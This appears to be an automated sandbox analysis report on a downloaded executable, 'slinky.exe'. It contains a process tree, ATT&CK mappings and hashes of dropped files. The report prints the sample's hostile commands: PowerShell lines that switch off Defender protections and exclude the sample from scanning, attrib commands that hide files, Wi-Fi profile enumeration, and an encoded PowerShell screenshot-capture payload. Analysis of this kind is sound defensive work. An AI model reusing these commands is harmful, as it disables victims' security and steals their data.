  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14689391077284460495,9103650220437831816,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5540 /prefetch:1
  2⤵
  PID:4288
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14689391077284460495,9103650220437831816,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5096 /prefetch:1
  2⤵
  PID:3828
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2056,14689391077284460495,9103650220437831816,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5308 /prefetch:8
  2⤵
  PID:4636
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14689391077284460495,9103650220437831816,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5860 /prefetch:1
  2⤵
  PID:1864
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14689391077284460495,9103650220437831816,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5888 /prefetch:1
  2⤵
  PID:3276
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2056,14689391077284460495,9103650220437831816,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5260 /prefetch:8
  2⤵
  PID:5316
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14689391077284460495,9103650220437831816,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3668 /prefetch:1
  2⤵
  PID:5324
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2056,14689391077284460495,9103650220437831816,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6100 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5376

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4408

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4904

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x308 0x244
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:452

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5720

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\slinky\" -spe -an -ai#7zMap2766:74:7zEvent23503
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5888

C:\Users\Admin\Downloads\slinky\slinky.exe
"C:\Users\Admin\Downloads\slinky\slinky.exe"
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Maps connected drives based on registry
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1232
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\Downloads\slinky\slinky.exe
  2⤵
  - Views/modifies file attributes
  PID:5520
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
  2⤵
  - Views/modifies file attributes
  PID:5548
- C:\Windows\System32\Wbem\wmic.exe
  wmic csproduct get UUID
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5600
- C:\Windows\System32\Wbem\wmic.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Suspicious use of AdjustPrivilegeToken
  PID:3712
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\Downloads\slinky\slinky.exe
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:5148
- C:\Windows\System32\Wbem\wmic.exe
  wmic os get Caption
  2⤵
  PID:5772
- C:\Windows\System32\Wbem\wmic.exe
  wmic cpu get Name
  2⤵
  PID:5932
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:4420
- C:\Windows\System32\Wbem\wmic.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:6012
- C:\Windows\System32\Wbem\wmic.exe
  wmic csproduct get UUID
  2⤵
  PID:6068
- C:\Windows\system32\attrib.exe
  attrib -r C:\Windows\System32\drivers\etc\hosts
  2⤵
  - Drops file in Drivers directory
  - Views/modifies file attributes
  PID:6100
- C:\Windows\system32\attrib.exe
  attrib +r C:\Windows\System32\drivers\etc\hosts
  2⤵
  - Drops file in Drivers directory
  - Views/modifies file attributes
  PID:4536
- C:\Windows\system32\netsh.exe
  netsh wlan show profiles
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Network Configuration Discovery: Wi-Fi Discovery
  PID:4996
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
  2⤵
  PID:2604
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ebe5ddma\ebe5ddma.cmdline"
    3⤵
    PID:5536
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1D57.tmp" "c:\Users\Admin\AppData\Local\Temp\ebe5ddma\CSCB5D18CD67A8C4D26A9B741671021D095.TMP"
      4⤵
      PID:5600

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
PID:5664

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
PID:5180

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
PID:5520

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
d7114a6cd851f9bf56cf771c37d664a2

SHA1
769c5d04fd83e583f15ab1ef659de8f883ecab8a

SHA256
d2c75c7d68c474d4b8847b4ba6cfd09fe90717f46dd398c86483d825a66e977e

SHA512
33bdae2305ae98e7c0de576de5a6600bd70a425e7b891d745cba9de992036df1b3d1df9572edb0f89f320e50962d06532dae9491985b6b57fd37d5f46f7a2ff8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
719923124ee00fb57378e0ebcbe894f7

SHA1
cc356a7d27b8b27dc33f21bd4990f286ee13a9f9

SHA256
aa22ab845fa08c786bd3366ec39f733d5be80e9ac933ed115ff048ff30090808

SHA512
a207b6646500d0d504cf70ee10f57948e58dab7f214ad2e7c4af0e7ca23ce1d37c8c745873137e6c55bdcf0f527031a66d9cc54805a0eac3678be6dd497a5bbc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
216B

MD5
997c0499d204b3040b5f23348c262491

SHA1
3dd0d53191eab9f567f16c9f2d32280c6b2185a4

SHA256
cd30e801a5af2f9d34cf3bc32ea8c1dbfcfc1c4eda9ad5ecbe9384ef0150ad10

SHA512
99795da8a73a11df864924ab796521d21dcac385e379ec38f503739566917cd1d8c519cbae6a799b25b0d58f111f6a70a223be35f057f5c7fe5da4ccd34a0056

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

Filesize
124KB

MD5
f5f7c496740cbe8e9a21777518ca17c6

SHA1
35fa04c3e096877722f07921326d706a368ca06b

SHA256
557ae710bfbc6c0a2afefc16740c67ebe86b45da41638f91cf1be0aaf4b49cde

SHA512
81a0d8ff31181eefb1d97aa937d950f46d18019fab49884b4feeda691c1de93d88733fd92cf58da7a3a68b9b5a6c2cf723174b7b14ac6b7b1fd44d02a3ff8178

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_mega.nz_0.indexeddb.leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

Filesize
105B

MD5
66f8dd72513b99b659f5e96ad284fa79

SHA1
7b366941103b7ea4d48cc4938b8fcbd4533a7bd4

SHA256
6bf4fb19d63e66a4f6dba1efd2439bc73ca21670030550a5682b323fdcac2176

SHA512
aa7710ad8714c96f975645acd0cf2a9613b320210ba3457039f85f1291af965c1e5fbe63f85576eaf36e3aed652f9c385b5a188565d4bb18f3e1b42f6e4d44a0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
503B

MD5
0c44e2d8189dac7f8798ce7a2d49a477

SHA1
a5f8f9d3354382a27c5f5b3100a043da2848f548

SHA256
049d5057b497639146efec459632472cf1a74c19eedbb9cc785588997c2f7430

SHA512
acfe1d4135a22c3963a9f154d499d4ecfcf9ed8d5b2f2f24da368b3e11622df51048cdf378e9f261663508305afef76448a5c83fbd88291aeba44718b8ea69e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
37d341a0a6422bec71e245707c0ac977

SHA1
e683b58b4bbeac531527e1b3edb2b96f97ea7fa7

SHA256
960dbaab15bed9def13991ad31f3f47328944d803966e8980abfce98234ddbec

SHA512
35b84801e881ccbb10b19bb37cc555dd0d440625cc1a05b73c00d55a92b8e5f75a191fd33ba939ba5fb65cf039352b8d43070b63a14cf65d9b3c7941f8ea80f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
84826188671b5f3b68a785aba2673d9b

SHA1
b468d33a22e9760ab35f77827b764bdd61997dd9

SHA256
e488f6853200ce67b75101934041079492ccb8b7f0a127c541a66cf47a26bb36

SHA512
d71c11d495d61efb54a91876d5bc9eb5568ae30b805e852de43e07ff07dac68e6880eddbf04bb819ca46e76e6d3c67ac63794f933b1787809263ef7ef294609e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
7888a67f3c4ab598aca7381d929fa685

SHA1
a44d2dd7d815bb634a4ff200cc57019f5fdd4646

SHA256
4d149a9884541dc475a1ae033221dd58c8bcfc2ba8ed6f5e06f655e3ec66b41f

SHA512
13bea84b1af10eceea57223537633331eff49d3774f6660e4f54d3d558ce10dd5c35a8400d797949f2465ad5ae72abf7f74947d448d3bffa5801fa06bfeea48e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
42187b863fe455ed5dc5a7ee94383497

SHA1
ac4bafa9e4e36274aa1516c1d0706183dbaaef86

SHA256
3c41d718a316d6c911707d350b324d90be52f775f2c94592def71863953a828e

SHA512
15bebc5b71c689f66af1d65022e80c77ab5be7deb07c392f1457a9a09190fabf6469d1db6e40cdb40b7ead05d601f963de9feb8599772222e8377c7b58812eeb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
f1caa2356006604c28c3ef637659792f

SHA1
5eb06d9af9eec78272e713070065577775a2f7bf

SHA256
5cc103d7f479fd92bcf4eda0fcaf236f8867e52091bf4bef148c89d12807825d

SHA512
19719c7e77384e54f90c6507735829fa9a1e3838f76d3e6d3bfc6776dff44b6258ac38d67c0dcf78e4afff1df4d0278945eeb9e1e5cafd9971db63c31331a2d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57ea50.TMP

Filesize
48B

MD5
e078be4edcf49a210f4a0dbfb24a2dd7

SHA1
4e4aeeb336b586bf27b56c5c59826bfacd45234c

SHA256
4b805c6e26dacc534b55da8d3a2e4b22bdaaa60e476936de6426ba1d69a55a2b

SHA512
cdf329fc24b6fce42ab0cc06a9f43a7ad9dcf5e688f1eccddec0be6eef84a0f24cd2df7b5413d3deece92546f1992b5a8a309698f2a9ecf263f1363182d113af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
4847fa926a82e7e1248691308c8ba5a4

SHA1
de96df006be02062023ba668ad03a8b6e3d70044

SHA256
726c68a5b785ce7bc369903346f30f31e0ac22adf418817623bcc517707d12da

SHA512
560c4f1ee3ba41a78f1ac015252e3a6eec9a118688e6920c7b38c1aa9597e3810e6a6f68d99622c92be0c3b905ed352256ff1cfbf2f1b43f098c6f18caa7c7f3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
e9e373249a9d8a39c951a370d704043f

SHA1
fc6edf7996cfab404506f10e206bcab57e09c2bd

SHA256
f7ee6c4fae0316be9349b9233258b3fb44d7ee4772a5f016f900855cfa5a3298

SHA512
19e7848a64db5d6005be404e85f44e3e884cf7abf80ed373164055732fee54d17490baafba3b209ffe28fc4c7a01adc28f75cf5bf235d8a97309d1eb627f91b1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
98baf5117c4fcec1692067d200c58ab3

SHA1
5b33a57b72141e7508b615e17fb621612cb8e390

SHA256
30bf8496e9a08f4fdfe4767abcd565f92b6da06ca1c7823a70cb7cab16262e51

SHA512
344a70bfc037d54176f12db91f05bf4295bb587a5062fd1febe6f52853571170bd8ef6042cb87b893185bbae1937cf77b679d7970f8cc1c2666b0b7c1b32987d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES1D57.tmp

Filesize
1KB

MD5
819d4aca867974a458eb734eb1552414

SHA1
e8670ea96cd465c3a7227d81160f9b2c8bfdbfcf

SHA256
ea28c33ada20d6a0df4184762a66bca271f004cdb7774e0ab5ee5c93b9a61235

SHA512
91816ff2f813a1f9b7ffaea6d255dfd700a84c35c9e833f0a4ac573b70033a66894cedbdf1c1e2dc5dad88eff23ae98e6647936afac4cc7d0b5798ae4d4d1483

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_clcmrp4o.hzx.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\browsers-temp\Admin\Edge\Default\history.txt

Filesize
717B

MD5
76c816855a5989e3ed5ad0be5348d980

SHA1
a8528103209fb7eef3f4f5e36a37a67e690bf425

SHA256
9fce2b2aa70f225c684fcafaba1c4d6443b62353d011246f8f92d61bbb3c252a

SHA512
76b32d28a8394237ab9cd5fa61ecaf90ad7bed0d1bd61e4a6737a8cd47f095b2dd8fc950e723daa8b98d0f2c056b903948f2fb00ab3a8d641854842ee658800d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ebe5ddma\ebe5ddma.dll

Filesize
4KB

MD5
406ee50bb9650fbfef9a8e373d482166

SHA1
3acb502dcb0b7b73abaca4cedaf30514c7c3fdb9

SHA256
376bca94f262314cdbabd489d81f5365cb35d263c63ea98a7be7491ee71d54c6

SHA512
d6febd5776b756a74d83dff3594e956a6c5b2f0f388ead47c51a8d95ed221418414c3e9578120cc075b663a8d7d10aa90ef4145994aa4cc592138771a7d22419

Download Submit
C:\Users\Admin\AppData\Local\Temp\xkYeg3kYOW\Display (1).png

Filesize
242KB

MD5
98bfb627f360f82033b035b1d47dd742

SHA1
5be65bbe2159f712c3eb8daa723b4076148f4c5a

SHA256
5b27b3043146a3774779959378b111b1f52bfe4668fd1132f946523b6dcc130f

SHA512
9bb335e33b7c0fd13471bf18eab8c5e4cdcf1599491158c630a7086c6804bbcf5049f9a254d67eeccfe1739c3f872ef875ce02f7349d80843e6cf4f5969fe13c

Download Submit
C:\Users\Admin\Downloads\slinky.rar

Filesize
26.1MB

MD5
2c6bddc33cec241b955de61acf5b3443

SHA1
d0d7fd56c6801edfe7d630e1760b4898b0a96010

SHA256
d2eaee32dee01579196e56203860fcf7280b1e327e6c37aaea3842477610154a

SHA512
a95254ccf49431214638205a404bf022c2dc0de45a46ff412d1161998274e1e72f71656e1814780e34acfb4dc51ddfdf7ea8408342152f66e2cdf6ff29448b63

Download Submit
C:\Users\Admin\Downloads\slinky\slinky.exe

Filesize
14.2MB

MD5
4a4caf999a86c98b74e6420c67300438

SHA1
0ac990e0538e617b90a97c770d78846c85e5d244

SHA256
e505bce6a09840009acd03bb1267c698f325daca99f72db6df3ae0f5e3affbbc

SHA512
aaa242afc08a097557e995c04aba0228a590006acbc16cec7ae6503bcd2463ea5e1320844b547b44f995c020c7f9ca0a3a6a38b5a6ee85e4a059989b31f72ebf

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
2KB

MD5
6e2386469072b80f18d5722d07afdc0b

SHA1
032d13e364833d7276fcab8a5b2759e79182880f

SHA256
ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

SHA512
e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

Download Submit
